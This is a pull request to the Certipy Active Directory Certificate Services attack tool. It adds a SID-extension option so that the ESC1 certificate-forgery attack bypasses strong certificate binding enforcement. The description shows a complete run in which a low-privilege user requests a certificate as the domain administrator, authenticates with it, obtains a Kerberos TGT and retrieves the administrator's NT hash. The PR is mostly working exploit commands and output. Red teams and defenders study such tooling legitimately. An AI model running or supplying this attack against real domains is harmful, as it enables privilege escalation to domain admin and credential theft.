### PR TITLE
add-sidextension-functionality-to-comply-with-AD-CS-Full-Enforcement-…

### DIFF
--- a/README.md
+++ b/README.md
@@ -180,6 +180,7 @@ certificate request options:
   -template template name
   -upn alternative UPN
   -dns alternative DNS
+  -sidextension sid     e.g. S-1-5-21-364857334-1705982952-2011365673-500
   -subject subject      Subject to include certificate, e.g. CN=Administrator,CN=Users,DC=CORP,DC=LOCAL
   -retrieve request ID  Retrieve an issued certificate specified by a request ID instead of requesting a new certificate
   -on-behalf-of domain\account

--- a/certipy/commands/parsers/req.py
+++ b/certipy/commands/parsers/req.py
@@ -26,6 +26,7 @@ def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable
     )
     group.add_argument("-upn", action="store", metavar="alternative UPN")
     group.add_argument("-dns", action="store", metavar="alternative DNS")
+    group.add_argument("-sidextension", action="store", metavar="sid", help="e.g. S-1-5-21-364857334-1705982952-2011365673-500")
     group.add_argument(
         "-subject",
         action="store",

--- a/certipy/commands/req.py
+++ b/certipy/commands/req.py
@@ -524,6 +524,7 @@ class Request:
         template: str = None,
         upn: str = None,
         dns: str = None,
+        sidextension: str = None,
         subject: str = None,
         retrieve: int = 0,
         on_behalf_of: str = None,
@@ -545,6 +546,7 @@ class Request:
         self.template = template
         self.alt_upn = upn
         self.alt_dns = dns
+        self.sidextension = sidextension
         self.subject = subject
         self.request_id = int(retrieve)
         self.on_behalf_of = on_behalf_of
@@ -669,6 +671,7 @@ class Request:
             username,
             alt_dns=self.alt_dns,
             alt_upn=self.alt_upn,
+            sidextension=self.sidextension,
             key=self.key,
             key_size=self.key_size,
             subject=self.subject,


### PR DESCRIPTION
Add sidextension functionality to comply with AD-CS Full Enforcement mode

```
certipy req -u test-lowpriv@domain.local -p <pw> -ca CA01-CA -template ESC1 -target-ip 192.168.5.213 -dc-ip 192.168.5.200 -upn administrator -sidextension S-1-5-21-364857334-1705982952-2011365673-500
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 34
[*] Got certificate with UPN 'administrator'
[*] Certificate object SID is 'S-1-5-21-364857334-1705982952-2011365673-500'
[*] Saved certificate and private key to 'administrator.pfx'

certipy auth -pfx administrator.pfx -domain domain.local
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@domain.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@domain.local': **************************:********************************

```
On DC:

```
PS C:\> Get-ItemPropertyValue -Path 'HKLM:\SYSTEM\CurrentControlSet\services\kdc' -Name  StrongCertificateBindingEnforcement
2
```